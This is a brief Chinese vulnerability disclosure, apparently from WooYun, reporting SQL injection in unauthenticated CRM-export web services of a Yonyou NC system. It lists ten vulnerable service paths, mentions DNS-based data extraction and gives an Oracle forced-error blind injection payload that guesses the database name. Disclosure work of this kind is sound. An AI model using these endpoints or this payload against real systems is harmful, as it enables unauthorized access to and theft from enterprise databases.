用友某系统多处注入漏洞

首先，该接口是无需权限访问的。已http://**.**.**.**/bugs/wooyun-2010-0178322为例：**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl均存在注入

无法报错注入的，因为我们填充的数据是随意填充的，也没有办法盲注，可以使用dns查询的方式。

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService

还有一种情况是无法报错注入，也不能盲注，延时也不可以，可以使用强制报错盲注的办法：'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。

http://**.**.**.**:9090/